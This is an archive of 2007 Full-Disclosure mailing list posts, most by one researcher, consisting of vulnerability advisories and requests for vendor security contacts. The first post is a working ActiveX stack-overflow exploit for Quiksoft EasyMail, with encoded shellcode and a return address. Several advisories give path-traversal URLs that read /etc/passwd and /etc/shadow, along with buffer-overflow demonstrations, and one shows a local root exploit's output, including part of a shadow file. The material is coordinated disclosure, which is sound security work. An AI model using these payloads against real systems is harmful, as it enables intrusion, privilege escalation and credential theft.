[Full-disclosure] Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit
Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow function Check() { var buf = 'A'; while (buf.length <= 440) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90"); var m = buf + eip + nop + shellcode1 + nop; obj.connect(m); } Failed to instantiate object. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security contact at Safeway US
Hi, apologies for a rather simple question: Does anyknow know a security contact at Safeway US (the supermarket chain)? I was unable to find one on their website and using Google...is it as simple as security_at_safeway.com or does anyone have a particular email address or contact I could use? Thanks. Best regards, Sebastian Wolfgarten ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local Buffer Overflow II - SUMMARY Description: Local buffer overflow vulnerability in McAfee Virus Scan for Linux and Unix allows arbitrary code execution Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) Date: August 15th, 2007 Severity: Low-Medium References: http://www.devtarget.org/mcafee-advisory-08-2007.txt III - OVERVIEW McAfee Virus Scan for Linux and Unix is a command-line version of the popular McAfee anti-virus scanner running on the Linux operating system as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was discovered that the product is prone to a classic buffer overflow vulnerability when attempting to scan files or directories with a particularly long name. This vulnerability results in the local execution of arbitrary code with the privileges of the user running the scanner, privilege escalation is by default not possible. Remote exploitation appears to be infeasible due to file length limitations in popular file systems. IV - DETAILS The overflow occurs when the product tries to scan a file or directory with a name that is longer than a certain size (approx. 4124+ bytes). For example on a Debian Linux 3.1 test system, it takes 4124+4 bytes to successfully overwrite the EIP register and thus execute arbitrary code: # /usr/local/uvscan/uvscan --version Virus Scan for Linux v5.10.0 Copyright (c) 1992-2006 McAfee, Inc. All rights reserved. (408) 988-3832 EVALUATION COPY - May 26 2006 Scan engine v5.1.00 for Linux. Virus data file v4777 created Jun 05 2006 Scanning for 194376 viruses, trojans and variants. # gdb /usr/local/uvscan/uvscan GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run `perl -e 'print "A"x4124 . "B"x4'` Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 . "B"x4'` (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread 1080238208 (LWP 2461)] (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1080238208 (LWP 2461)] 0x42424242 in ?? () (gdb) info registers eax0x1 1 ecx0x8068430134644784 edx0x1 1 ebx0x41414141 1094795585 esp0xbfffdc40 0xbfffdc40 ebp0x41414141 0x41414141 esi0x41414141 1094795585 edi0x41414141 1094795585 eip0x42424242 0x42424242 eflags 0x282642 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 V - EXPLOIT CODE An exploit for this vulnerability has been developed but will not released to the general public at this time. VI - WORKAROUND/FIX To address this problem, the vendor has released McAfee VirusScan Command Line Scanner for Linux and Unix version 5.20. Thus all users of the product are asked to test and install this patch as soon as possible. McAfee has also published a dedicated security bulletin that covers the problem (see https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576). VII - DISCLOSURE TIMELINE 18. December 2006 - Notified [EMAIL PROTECTED] 19. December 2006 - Vendor responded that vulnerability is being investigated 19. December to 15. August 2007 - Weekly vendor report on the progress of the development of the patch 01. August 2007 - Release of patch 15. August 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwvgWd8QFWG1Rza8RAjyeAKC6zp+l6CwLw6/eQ80c6CDue4DpUwCdHtS9 pUdSpbqcZz1QkpM/YDc0dN4= =PUZy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Buffer overflow in Areca CLI, version <= 1.72.250
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: Buffer overflow in Areca CLI, version <= 1.72.250 II - SUMMARY Description: Local buffer overflow vulnerability in Areca CLI allows for arbitrary code execution and eventually privilege escalation Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: July 22th, 2007 Severity: Medium References: http://www.devtarget.org/areca-advisory-07-2007.txt III - OVERVIEW Areca-CLI (cli32) is a command line interface to query and alter the settings of Areca ARC-xxx SATA RAID controllers. More information about the product can be found online at http://www.areca.com.tw. IV - DETAILS The application "Areca CLI, version <= 1.72.250" (cli32) is prone to a classic buffer overflow vulnerability when a particularly long command-line argument is being passed and the application attempts to copy that argument into a finite buffer. On a Debian 4.0 test system (kernel 2.6.20) for instance an attacker is required to supply more than 520 characters to completely overwrite the EIP register and thus execute arbitrary code. Please notice that besides Linux other platforms (e.g. FreeBSD) might be affected as well (unchecked). V - ANALYSIS The severity of this vulnerability is probably "medium" as it can only be exploited locally and the file cli32 is not set suid root by default. However when being used in combination with software such as Nagios to locally or remotely monitor the status of a RAID controller, many people tend to assign suid root privileges to this file in order to be able to query the status of the controller via a web interface. Consequently in such a sitation, this vulnerability will result in a privilege escalation enabling local users to gain root privileges. VI - EXPLOIT CODE An exploit for this vulnerability has been developed but will not be released to the general public at this time. However developing an exploit for this vulnerability is trivial. VII - WORKAROUND/FIX The vendor confirmed the vulnerability but failed to respond to several emails asking for a concrete timeline to fix the problem. Thus to mitigate the vulnerability, one is advised to ensure the file "cli32" is not set suid root and ask the vendor to develop and supply a patch in the near future. VIII - DISCLOSURE TIMELINE 07. June 2007 - Notified {support,security,[EMAIL PROTECTED] 08. June 2007 - Vulnerability confirmed 11. June 2007 - Response from vendor 16. June 2007 - Contact to vendor (several times), no reply 22. July 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGo1TKd8QFWG1Rza8RAq0WAKCHv9ngp+wDJHkkoq6UqOkvsoL5QgCfRe0t Tk/lQgb5LKiSpAP4lGfcXrg= =S6Um -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: Arbitrary file disclosure vulnerability in rrdbrowse II - SUMMARY Description: Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6 Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: March 4th, 2007 Severity: Medium References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt III - OVERVIEW Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and webinterface for RRDTool. It has a threaded daemon which periodically runs from cron. It works with small .nfo files which hold router information and optionally connection details, colors, min max, bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism to store interface names. It's much MRTG like in it's current state". More information about the product can be found online at http://www.rrdbrowse.org. IV - DETAILS Due to inproper input validation, the CGI application "rrdbrowse" (versions <=1.6) is vulnerable to an arbitrary file disclosure vulnerability. It allows an unauthenticated remote attacker to read any file on the remote system if the user the webserver is running as has permissions to do so. Thus an attacker is able to gain access potentially sensitive information. V - EXPLOIT CODE The vulnerability is trivial to exploit and only requires specifying an URL with a relative file path on the remote system such as http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd As the input to the "file" parameter is not validated in any way accessing this URL will expose the contents of /etc/passwd to a remote attacker (interestingly except the first line). VI - WORKAROUND/FIX To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has released an updated CVS version (1.7) of the software which is available at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to test and install this version as soon as possible. VII - DISCLOSURE TIMELINE 06. February 2007 - Notified vendor 14. Feburary 2007 - Patch/new version released 04. March 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF6x+Gd8QFWG1Rza8RAl6FAKCw6la8aVEeWRjqQrodHDUDAl3vtgCgwmam X8HoWAJAhG3FlWeOebHRCTY= =ifKG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Arbitrary file disclosure vulnerability in IP3 NetAccess < 4.1.9.6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: Arbitrary file disclosure vulnerability in IP3 NetAccess leads to full system compromise II - SUMMARY Description: Arbitrary file disclosure vulnerability in IP3 NetAccess leads to full system compromise Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com) Date: February 11th, 2007 Severity: High References: http://www.devtarget.org/ip3-advisory-02-2007.txt III - OVERVIEW IP3's NetAccess is a device created for high demand environments such as convention centers or hotels. It handles the Internet access and provides for instance firewalling, billing, rate-limiting as well as various authentication mechanisms. The device is administrated via SSH or a web-based GUI. Further information about the product can be found online at http://www.ip3.com/poverview.htm. IV - DETAILS Due to inproper input validation, all NetAccess devices with a firmware version less than 4.1.9.6 are vulnerable to an arbitrary file disclosure vulnerability. This vulnerability allows an unauthenticated remote attacker to abuse the web interface and read any file on the remote system. Due to the fact that important system files are world-readable (see bid #17698), this does include /etc/shadow and thus leads to a full compromise of the device! In addition an attacker is able to gain access to the proprietary code base of the device and potentially identify as well as exploit other (yet unknown) vulnerabilities. V - EXPLOIT CODE The trivial vulnerability can be exploited by accessing the file "getfile.cgi" with a relative file path such as http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow As the input to the "filename" parameter is not properly validated accessing this URL will disclose the contents of /etc/shadow to a remote attacker. VI - WORKAROUND/FIX To address this problem, the vendor has released a new firmware version (4.1.9.6) which is available at http://www.ip3.com. Hence all users of IP3's NetAccess devices are asked to install this version immediately. As a temporary workaround, one may also limit the accessibility of the web interface of the device to authorized personnel only. Nevertheless contacting the vendor and installing the new firmware version is highly recommended! VII - DISCLOSURE TIMELINE 31. December 2006 - Notified vendor 31. December 2006 - Vulnerability confirmed 17. January 2007 - Patch released 11. February 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFz417d8QFWG1Rza8RAlGdAKCgbw/HBweXPlDQW+T8A7JAagrPWQCeKetH EJAG2aGxvYbSTMH/n6Sd9sc= =nMqJ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Arbitrary file disclosure vulnerability in php rrd browser < 0.2.1 (prb)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I - TITLE Security advisory: Arbitrary file disclosure vulnerability in php rrd browser (prb) II - SUMMARY Description: Arbitrary file disclosure vulnerability in php rrd browser < 0.2.1 Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: February 11th, 2007 Severity: Medium References: http://www.devtarget.org/prb-advisory-02-2007.txt III - OVERVIEW Quote from sourceforge.net: "Prb stands for php rrd browser, inspired by rrdbrowse and cacti. A modular framework for creating rrd databases, updating and graphing data, based on apache, php, mysql and rrdtool. It will allow you to graph just about anything you like". More information about the product can be found online at http://prb.sourceforge.net. IV - DETAILS Due to inproper input validation, the web application "php rrd browser" (versions <0.2.1) is vulnerable to an arbitrary file disclosure vulnerability. It allows an unauthenticated remote attacker to read any file on the remote system if the user the webserver is running as has permissions to do so. Thus an attacker is able to gain access potentially sensitive information. V - EXPLOIT CODE The vulnerability is trivial to exploit and only requires specifying an URL with a relative file path on the remote system such as http://$target/prb/www/?p=../../../../../../../etc/passwd As the input to the "p" parameter is not validated in any way accessing this URL will expose the contents of /etc/passwd to a remote attacker. VI - WORKAROUND/FIX To address this problem, the author of prb (Guillaume Fontaine) has released an updated version (0.2.1) of the software which is available at http://prb.sourceforge.net. Hence all users of prb are asked to test and install this version as soon as possible. VII - DISCLOSURE TIMELINE 07. February 2007 - Notified vendor 10. Feburary 2007 - Patch released 11. February 2007 - Public disclosure -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFz0H9d8QFWG1Rza8RAncSAJwMe7l768sWSruW8xsHHexUD1vTYwCgoSnA xP1J4Bg/qIlNr//YkVbPMhY= =i7Q0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux
I - TITLE Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux II - SUMMARY Description: Local buffer overflow vulnerability in VSAPI library allows arbitrary code execution and leads to privilege escalation Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: January 25th, 2007 Severity: Medium References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt III - OVERVIEW The Trend Micro VirusWall is a software solution to block viruses, spyware, spam and various other kinds of threats at the Internet gateway. More information about the product can be found online at http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm. IV - DETAILS The product "InterScan VirusWall 3.81 for Linux" ships a legacy library called "libvsapi.so" which is vulnerable to a memory corruption vulnerability. One of the applications that apparently uses this library is called "vscan" which is set suid root by default. It was discovered that this supporting program is prone to a classic buffer overflow vulnerability when a particularly long command-line argument is being passed and the application utilizes the flawed library to attempt to copy that data into a finite buffer. On a Debian 3.1 test system for instance an attacker is required to supply 1116 + 4 bytes to completely overwrite the EIP register and thus execute arbitrary code with root level privileges: # /opt/trend/ISBASE/IScan.BASE/vscan -v Virus Scanner v3.1, VSAPI v6.810-1005 Trend Micro Inc. 1996,1997 Pattern version 684 Pattern number 56446 No scan target specified!! do nothing. # gdb /opt/trend/ISBASE/IScan.BASE/vscan GNU gdb 6.3-debian Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-linux"...(no debugging symbols found) Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run `perl -e 'print "A"x1116 . "B"x4'` Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print "A"x1116 . "B"x4'` (no debugging symbols found) Virus Scanner v3.1, VSAPI v6.810-1005 Trend Micro Inc. 1996,1997 Pattern version 684 Pattern number 56446 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) info registers eax0x -1 ecx0x24 36 edx0x40277560 1076327776 ebx0xba03 -1073743357 esp0xb818 0xb818 ebp0x41414141 0x41414141 esi0xb838 -1073743816 edi0x804f008134541320 eip0x42424242 0x42424242 eflags 0x287647 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 V - ANALYSIS The severity of this vulnerability is probably "medium" as by default the vscan file is only executable by the root user as well as members of the "iscan" group which is created during the installation of the software: # ls -la /opt/trend/ISBASE/IScan.BASE/vscan -r-sr-x--- 1 root iscan 24400 2003-12-20 03:53 /opt/trend/ISBASE/IScan.BASE/vscan However administrators may potentially have changed the default permissions and thus granted all local users the privilege to execute the file. If this library is also used by other applications they may also be flawed (unchecked). VI - EXPLOIT CODE An exploit for this vulnerability is attached to this email and can also be found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a local privilege escalation: [EMAIL PROTECTED]:~$ ./tmvwall381v3_exp Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) Author: Sebastian Wolfgarten, <[EMAIL PROTECTED]> Date: January 3rd, 2007 Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! Virus Scanner v3.1, VSAPI v8.310-1002 Trend Micro Inc. 1996,1997 Pattern number 4.155.00 sh-2.05b# id uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) sh-2.05b# cat /etc/shadow root:***REMOVED***:13372:0:9:7::: daemon:*:13372:0:9:7::: bin:*:13372:0:9:7::: sys:*:13372:0:9:7::: sync:*:13372:0:9:7::: games:*:13372:0:9:7::: [...] iscan:!:13500:0:9:7::: sebastian:***REMOVE
[Full-disclosure] Security contact at TrendMicro
Hi, does anyknow know a security contact at TrendMicro? I was unable to find one on their website and tried both [EMAIL PROTECTED] as well as [EMAIL PROTECTED] but they bounced back. Anyone? Thanks. Ah yeah, Happy New Year everyone! Best regards, Sebastian Wolfgarten ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security contact at McAfee (follow-up)
Hi, thanks for all the private responses I received so far. For the FD archives: The security contacts at McAfee are available at <[EMAIL PROTECTED]> and <[EMAIL PROTECTED]> respectively. Sorry for the noise and good night! Best regards, Sebastian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security contact at McAfee
Hi, apologies for this rather dumb question: Does anyknow know a security contact at McAfee? I was unable to find one on their website...is it as simple as [EMAIL PROTECTED] Thanks. Best regards, Sebastian Wolfgarten ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using SMS spoofing to locate almost anyone in the UK without their permission
Hi, interesting idea. However Major Malfunction did this ages ago (even in an automated manner where the individual does not have to respond to the text message as his software does instead) as part of the Trifinite's research on Bluetooth security. See their 22C3 presentation for more information. Bye, Seb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/